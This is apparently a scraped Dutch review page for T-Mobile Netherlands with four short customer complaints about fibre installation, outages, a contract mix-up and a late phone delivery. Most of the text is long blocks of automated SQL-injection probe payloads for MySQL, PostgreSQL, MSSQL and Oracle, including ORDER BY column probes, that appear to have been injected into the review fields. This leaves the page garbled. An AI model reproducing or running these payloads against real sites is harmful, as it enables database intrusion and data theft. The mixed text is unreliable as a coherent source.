  vsXG) AND 5506=CAST((CHR(113)||CHR(98)||CHR(112)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (5506=5506) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(118)||CHR(120)||CHR(113)) AS NUMERIC) AND (2086=2086

  vsXG AND 5506=CAST((CHR(113)||CHR(98)||CHR(112)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (5506=5506) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(118)||CHR(120)||CHR(113)) AS NUMERIC)

  vsXG AND 5506=CAST((CHR(113)||CHR(98)||CHR(112)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (5506=5506) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(118)||CHR(120)||CHR(113)) AS NUMERIC)-- UfMg

  vsXG') AND 8247 IN (SELECT (CHAR(113)+CHAR(98)+CHAR(112)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (8247=8247) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(120)+CHAR(113))) AND ('NEGX'='NEGX

  vsXG' AND 8247 IN (SELECT (CHAR(113)+CHAR(98)+CHAR(112)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (8247=8247) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(120)+CHAR(113))) AND 'QKAx'='QKAx

  vsXG) AND 8247 IN (SELECT (CHAR(113)+CHAR(98)+CHAR(112)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (8247=8247) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(120)+CHAR(113))) AND (1385=1385

  vsXG AND 8247 IN (SELECT (CHAR(113)+CHAR(98)+CHAR(112)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (8247=8247) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(120)+CHAR(113)))

  vsXG AND 8247 IN (SELECT (CHAR(113)+CHAR(98)+CHAR(112)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (8247=8247) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(120)+CHAR(113)))-- yewG

  vsXG') AND 1264=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(112)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (1264=1264) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(118)||CHR(120)||CHR(113)||CHR(62))) FROM DUAL) AND ('BEud'='BEud

  vsXG' AND 1264=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(112)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (1264=1264) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(118)||CHR(120)||CHR(113)||CHR(62))) FROM DUAL) AND 'KLVM'='KLVM

  vsXG) AND 1264=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(112)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (1264=1264) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(118)||CHR(120)||CHR(113)||CHR(62))) FROM DUAL) AND (4795=4795

  vsXG AND 1264=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(112)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (1264=1264) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(118)||CHR(120)||CHR(113)||CHR(62))) FROM DUAL)

  vsXG AND 1264=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(112)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (1264=1264) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(118)||CHR(120)||CHR(113)||CHR(62))) FROM DUAL)-- ZOjY

  vsXG') ORDER BY 1-- eZos

  vsXG' ORDER BY 1-- CCyW

  vsXG) ORDER BY 1-- yfbJ

  vsXG ORDER BY 1-- oiyk

  vsXG ORDER BY 1-- GlYe

 • Bestellen

  Service

  Prijs

  Levering

  Zou hier weer kopen
  Totaal

  Tv en internet (glasvezel)

  Wat een flut bedrijf. Vanaf mei al bezig met het laten aansluiten van glasvezel. We worden van onderaannemer naar onderaannemer gestuurd, loze beloftes worden er gedaan en tot op heden werkt het nog steeds niet. Niemand kan ons vertellen waarom precies niet en wanneer het wordt opgelost, want ze wijzen allemaal naar elkaar. Echt een stelletje amateuristen. Nooit aan beginnen en lekker wachten totdat de glasvezel kabel voor meerdere providers open staat.

  GNRW') AND EXTRACTVALUE(2869,CONCAT(0x5c,0x71706b6271,(SELECT (ELT(2869=2869,1))),0x7162787171)) AND ('tWou'='tWou

  GNRW' AND EXTRACTVALUE(2869,CONCAT(0x5c,0x71706b6271,(SELECT (ELT(2869=2869,1))),0x7162787171)) AND 'nKaa'='nKaa

  GNRW) AND EXTRACTVALUE(2869,CONCAT(0x5c,0x71706b6271,(SELECT (ELT(2869=2869,1))),0x7162787171)) AND (7150=7150

  GNRW AND EXTRACTVALUE(2869,CONCAT(0x5c,0x71706b6271,(SELECT (ELT(2869=2869,1))),0x7162787171))

  GNRW AND EXTRACTVALUE(2869,CONCAT(0x5c,0x71706b6271,(SELECT (ELT(2869=2869,1))),0x7162787171))-- tnqu

  GNRW') AND 3619=CAST((CHR(113)||CHR(112)||CHR(107)||CHR(98)||CHR(113))||(SELECT (CASE WHEN (3619=3619) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(120)||CHR(113)||CHR(113)) AS NUMERIC) AND ('CwMj'='CwMj

  GNRW' AND 3619=CAST((CHR(113)||CHR(112)||CHR(107)||CHR(98)||CHR(113))||(SELECT (CASE WHEN (3619=3619) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(120)||CHR(113)||CHR(113)) AS NUMERIC) AND 'KNkV'='KNkV

  GNRW) AND 3619=CAST((CHR(113)||CHR(112)||CHR(107)||CHR(98)||CHR(113))||(SELECT (CASE WHEN (3619=3619) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(120)||CHR(113)||CHR(113)) AS NUMERIC) AND (4161=4161

  GNRW AND 3619=CAST((CHR(113)||CHR(112)||CHR(107)||CHR(98)||CHR(113))||(SELECT (CASE WHEN (3619=3619) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(120)||CHR(113)||CHR(113)) AS NUMERIC)

  GNRW AND 3619=CAST((CHR(113)||CHR(112)||CHR(107)||CHR(98)||CHR(113))||(SELECT (CASE WHEN (3619=3619) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(120)||CHR(113)||CHR(113)) AS NUMERIC)-- uJdC

  GNRW') AND 6782 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(107)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (6782=6782) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(120)+CHAR(113)+CHAR(113))) AND ('DSAs'='DSAs

  GNRW' AND 6782 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(107)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (6782=6782) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(120)+CHAR(113)+CHAR(113))) AND 'oUje'='oUje

  GNRW) AND 6782 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(107)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (6782=6782) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(120)+CHAR(113)+CHAR(113))) AND (3069=3069

  GNRW AND 6782 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(107)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (6782=6782) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(120)+CHAR(113)+CHAR(113)))

  GNRW AND 6782 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(107)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (6782=6782) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(120)+CHAR(113)+CHAR(113)))-- CkQI

  GNRW') AND 7375=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(107)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (7375=7375) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(120)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL) AND ('nahQ'='nahQ

  GNRW' AND 7375=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(107)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (7375=7375) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(120)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL) AND 'IpVh'='IpVh

  GNRW) AND 7375=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(107)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (7375=7375) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(120)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL) AND (2307=2307

  GNRW AND 7375=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(107)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (7375=7375) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(120)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL)

  GNRW AND 7375=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(107)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (7375=7375) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(120)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL)-- CwXt

  GNRW') ORDER BY 1-- NxJu

  GNRW' ORDER BY 1-- pDwt

  GNRW) ORDER BY 1-- JcsD

  GNRW ORDER BY 1-- QaRn

  GNRW ORDER BY 1-- RqSz

 • Bestellen

  Service

  Prijs

  Levering

  Zou hier weer kopen
  Totaal

  T-Mobile thuis

  Wij zitten in onze elektronicawinkel 3 weken zonder internet
  Vaker T-Mobile klantenservice gebeld en iedere keer ruim een uur lang aan de lijn om alle stappen nemen wat ze willen.
  De conclusie was iedere keer anders dan wat wij vorige keer gehoord hadden.
  Ene keer moest een monteur langs komen en andere keer een nieuw router en de keer daarna met een uur probleem opgelost zou zijn.
  Geen 1 van alle beloftes die T-Mobile deed zijn nagekomen .
  Vandaag hebben wij besloten om dubbele kosten te betalen en hebben contact gehad met KPN met de vraag of ze voor een werkende internet kunnen zorgen .
  Volgens KPN is dat ook onmogelijk omdat de lijn bezet is door T-Mobile.
  Waardelos bedrijf met zeer slechte klantenservice die niets voor je doen en alleen jou vragen om stappen voor hun door te nemen.

  TWMN') AND EXTRACTVALUE(9152,CONCAT(0x5c,0x7170716a71,(SELECT (ELT(9152=9152,1))),0x7162707171)) AND ('oYfP'='oYfP

  TWMN' AND EXTRACTVALUE(9152,CONCAT(0x5c,0x7170716a71,(SELECT (ELT(9152=9152,1))),0x7162707171)) AND 'NGgy'='NGgy

  TWMN) AND EXTRACTVALUE(9152,CONCAT(0x5c,0x7170716a71,(SELECT (ELT(9152=9152,1))),0x7162707171)) AND (5196=5196

  TWMN AND EXTRACTVALUE(9152,CONCAT(0x5c,0x7170716a71,(SELECT (ELT(9152=9152,1))),0x7162707171))

  TWMN AND EXTRACTVALUE(9152,CONCAT(0x5c,0x7170716a71,(SELECT (ELT(9152=9152,1))),0x7162707171))-- Dvmo

  TWMN') AND 3800=CAST((CHR(113)||CHR(112)||CHR(113)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (3800=3800) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(112)||CHR(113)||CHR(113)) AS NUMERIC) AND ('ehLL'='ehLL

  TWMN' AND 3800=CAST((CHR(113)||CHR(112)||CHR(113)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (3800=3800) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(112)||CHR(113)||CHR(113)) AS NUMERIC) AND 'HdgY'='HdgY

  TWMN) AND 3800=CAST((CHR(113)||CHR(112)||CHR(113)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (3800=3800) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(112)||CHR(113)||CHR(113)) AS NUMERIC) AND (6440=6440

  TWMN AND 3800=CAST((CHR(113)||CHR(112)||CHR(113)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (3800=3800) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(112)||CHR(113)||CHR(113)) AS NUMERIC)

  TWMN AND 3800=CAST((CHR(113)||CHR(112)||CHR(113)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (3800=3800) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(112)||CHR(113)||CHR(113)) AS NUMERIC)-- Inbe

  TWMN') AND 8159 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(113)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (8159=8159) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(113)+CHAR(113))) AND ('vDsI'='vDsI

  TWMN' AND 8159 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(113)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (8159=8159) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(113)+CHAR(113))) AND 'DxMf'='DxMf

  TWMN) AND 8159 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(113)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (8159=8159) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(113)+CHAR(113))) AND (6472=6472

  TWMN AND 8159 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(113)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (8159=8159) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(113)+CHAR(113)))

  TWMN AND 8159 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(113)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (8159=8159) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(113)+CHAR(113)))-- xYUB

  TWMN') AND 1175=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(113)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (1175=1175) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(112)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL) AND ('ohbH'='ohbH

  TWMN' AND 1175=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(113)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (1175=1175) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(112)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL) AND 'HBXD'='HBXD

  TWMN) AND 1175=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(113)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (1175=1175) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(112)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL) AND (6607=6607

  TWMN AND 1175=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(113)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (1175=1175) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(112)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL)

  TWMN AND 1175=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(113)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (1175=1175) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(112)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL)-- hoXu

  TWMN') ORDER BY 1-- xsXn

  TWMN' ORDER BY 1-- PoLG

  TWMN) ORDER BY 1-- TEHh

  TWMN ORDER BY 1-- vteZ

  TWMN ORDER BY 1-- zxYF

 • Bestellen

  Service

  Prijs

  Levering

  Zou hier weer kopen
  Totaal

  Iphone 13 Pro incl. 2 jarig abonnement

  Wat een slechte organisatie! Na 10 jaar klant te zijn geweest met T-Mobile mobiel besloten hierbij de stekker eruit te trekken. Ik kon mijn abonnement verlengen vanwege afloop van het 2 jarige contract. T-Mobile telefonisch gecontacteerd om aanvullende vragen te stellen en het particulieren abonnement om te laten zetten naar zakelijk met behoudt van het telefoonnummer en een nieuwe telefoon de IPhone 13 Pro. De reden van het omzetten is omdat ik veel zakelijk bel en de belangrijkste reden geen BKR-registratie krijg als bedrijf zijnde aangezien ik bezig ben met een hypotheek voor een woning.
  Telefonisch worden geholpen door ene Tim en werd er gevraagd naar mijn KVK, zakelijke rekening etc.. uitgevraagd en ik heb nadrukkelijk gevraagd is het nu zakelijk omgezet, het antwoord van Tim ''Ja, het is geregeld''. Mooi dacht ik en kon in de middag al de telefoon ophalen. Goed geregeld dacht ik!

  De volgende dag T-Mobile gebeld met de vraag of alles geregeld is en of het zakelijke abonnement goed is omgezet aangezien ik geen zin heb om straks 16K minder hypotheek te kunnen krijgen voor de aankoop van mijn woning. En je raadt het al, meneer Tim heeft wel mijn zakelijke gegevens omgezet maar geen zakelijk abonnement van gemaakt! Ik heb er dus geen reet aan en ik krijg alsnog de BKR-registratie in m'n mik. Administratief kan het blijkbaar in deze logge organisatie niet omgezet worden en moet ik het hele retourproces doorlopen, toestel terugsturen, zakelijk abonnement aansluiten, toestel opnieuw bestellen en WEER ophalen bij een T-mobile winkel. Omslachtig, kost tijd en geld!

  Bij deze overstappen naar een stabiele provider KPN

  onWw') AND EXTRACTVALUE(7711,CONCAT(0x5c,0x7176787871,(SELECT (ELT(7711=7711,1))),0x716b7a7171)) AND ('OaES'='OaES

  onWw' AND EXTRACTVALUE(7711,CONCAT(0x5c,0x7176787871,(SELECT (ELT(7711=7711,1))),0x716b7a7171)) AND 'FXCe'='FXCe

  onWw) AND EXTRACTVALUE(7711,CONCAT(0x5c,0x7176787871,(SELECT (ELT(7711=7711,1))),0x716b7a7171)) AND (4118=4118

  onWw AND EXTRACTVALUE(7711,CONCAT(0x5c,0x7176787871,(SELECT (ELT(7711=7711,1))),0x716b7a7171))

  onWw AND EXTRACTVALUE(7711,CONCAT(0x5c,0x7176787871,(SELECT (ELT(7711=7711,1))),0x716b7a7171))-- oVlW

  onWw') AND 8835=CAST((CHR(113)||CHR(118)||CHR(120)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (8835=8835) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(107)||CHR(122)||CHR(113)||CHR(113)) AS NUMERIC) AND ('ZuRb'='ZuRb

  onWw' AND 8835=CAST((CHR(113)||CHR(118)||CHR(120)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (8835=8835) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(107)||CHR(122)||CHR(113)||CHR(113)) AS NUMERIC) AND 'DOEf'='DOEf

  onWw) AND 8835=CAST((CHR(113)||CHR(118)||CHR(120)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (8835=8835) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(107)||CHR(122)||CHR(113)||CHR(113)) AS NUMERIC) AND (4645=4645

  onWw AND 8835=CAST((CHR(113)||CHR(118)||CHR(120)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (8835=8835) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(107)||CHR(122)||CHR(113)||CHR(113)) AS NUMERIC)

  onWw AND 8835=CAST((CHR(113)||CHR(118)||CHR(120)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (8835=8835) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(107)||CHR(122)||CHR(113)||CHR(113)) AS NUMERIC)-- KhvL

  onWw') AND 3611 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (3611=3611) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(122)+CHAR(113)+CHAR(113))) AND ('iqBj'='iqBj

  onWw' AND 3611 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (3611=3611) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(122)+CHAR(113)+CHAR(113))) AND 'iZPk'='iZPk

  onWw) AND 3611 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (3611=3611) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(122)+CHAR(113)+CHAR(113))) AND (6112=6112

  onWw AND 3611 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (3611=3611) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(122)+CHAR(113)+CHAR(113)))

  onWw AND 3611 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (3611=3611) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(122)+CHAR(113)+CHAR(113)))-- aMDx

  onWw') AND 4883=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (4883=4883) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(122)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL) AND ('bcTh'='bcTh

  onWw' AND 4883=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (4883=4883) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(122)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL) AND 'QDJK'='QDJK

  onWw) AND 4883=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (4883=4883) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(122)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL) AND (7772=7772

  onWw AND 4883=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (4883=4883) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(122)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL)

  onWw AND 4883=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (4883=4883) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(122)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL)-- anJl

  onWw') ORDER BY 1-- KbnQ

  onWw' ORDER BY 1-- GriF

  onWw) ORDER BY 1-- CDau

  onWw ORDER BY 1-- XepD

  onWw ORDER BY 1-- oIsl

 • Bestellen

  Service

  Prijs

  Levering

  Zou hier weer kopen
  Totaal

  Telefoon

  Heb op 14 juni een telefoon besteld maar is nog steeds niet geleverd op 18 juli. Het bellen met de klantenservice levert niets op. Waardeloos bedrijf. Ook het langsgaan bij een filiaal krijg je geen antwoord. Krijg nergens een antwoord op. Zou niemand aanraden om hier een telefoon te kopen.

  QMKp') AND EXTRACTVALUE(3578,CONCAT(0x5c,0x7170767871,(SELECT (ELT(3578=3578,1))),0x716a626271)) AND ('veJy'='veJy

  QMKp' AND EXTRACTVALUE(3578,CONCAT(0x5c,0x7170767871,(SELECT (ELT(3578=3578,1))),0x716a626271)) AND 'KTdS'='KTdS

  QMKp) AND EXTRACTVALUE(3578,CONCAT(0x5c,0x7170767871,(SELECT (ELT(3578=3578,1))),0x716a626271)) AND (3724=3724

  QMKp AND EXTRACTVALUE(3578,CONCAT(0x5c,0x7170767871,(SELECT (ELT(3578=3578,1))),0x716a626271))

  QMKp AND EXTRACTVALUE(3578,CONCAT(0x5c,0x7170767871,(SELECT (ELT(3578=3578,1))),0x716a626271))-- WNRf

  QMKp') AND 5072=CAST((CHR(113)||CHR(112)||CHR(118)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (5072=5072) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(98)||CHR(98)||CHR(113)) AS NUMERIC) AND ('wiLe'='wiLe

  QMKp' AND 5072=CAST((CHR(113)||CHR(112)||CHR(118)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (5072=5072) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(98)||CHR(98)||CHR(113)) AS NUMERIC) AND 'JNAd'='JNAd

  QMKp) AND 5072=CAST((CHR(113)||CHR(112)||CHR(118)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (5072=5072) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(98)||CHR(98)||CHR(113)) AS NUMERIC) AND (9381=9381

  QMKp AND 5072=CAST((CHR(113)||CHR(112)||CHR(118)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (5072=5072) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(98)||CHR(98)||CHR(113)) AS NUMERIC)

  QMKp AND 5072=CAST((CHR(113)||CHR(112)||CHR(118)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (5072=5072) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(98)||CHR(98)||CHR(113)) AS NUMERIC)-- aELH

  QMKp') AND 3526 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(118)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (3526=3526) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(98)+CHAR(98)+CHAR(113))) AND ('tdcd'='tdcd

  QMKp' AND 3526 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(118)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (3526=3526) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(98)+CHAR(98)+CHAR(113))) AND 'cEqK'='cEqK

  QMKp) AND 3526 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(118)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (3526=3526) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(98)+CHAR(98)+CHAR(113))) AND (7981=7981

  QMKp AND 3526 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(118)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (3526=3526) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(98)+CHAR(98)+CHAR(113)))

  QMKp AND 3526 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(118)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (3526=3526) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(98)+CHAR(98)+CHAR(113)))-- FCAp

  QMKp') AND 7991=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(118)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (7991=7991) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(98)||CHR(98)||CHR(113)||CHR(62))) FROM DUAL) AND ('WvIo'='WvIo

  QMKp' AND 7991=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(118)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (7991=7991) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(98)||CHR(98)||CHR(113)||CHR(62))) FROM DUAL) AND 'IeLI'='IeLI

  QMKp) AND 7991=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(118)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (7991=7991) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(98)||CHR(98)||CHR(113)||CHR(62))) FROM DUAL) AND (5793=5793

  QMKp AND 7991=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(118)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (7991=7991) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(98)||CHR(98)||CHR(113)||CHR(62))) FROM DUAL)

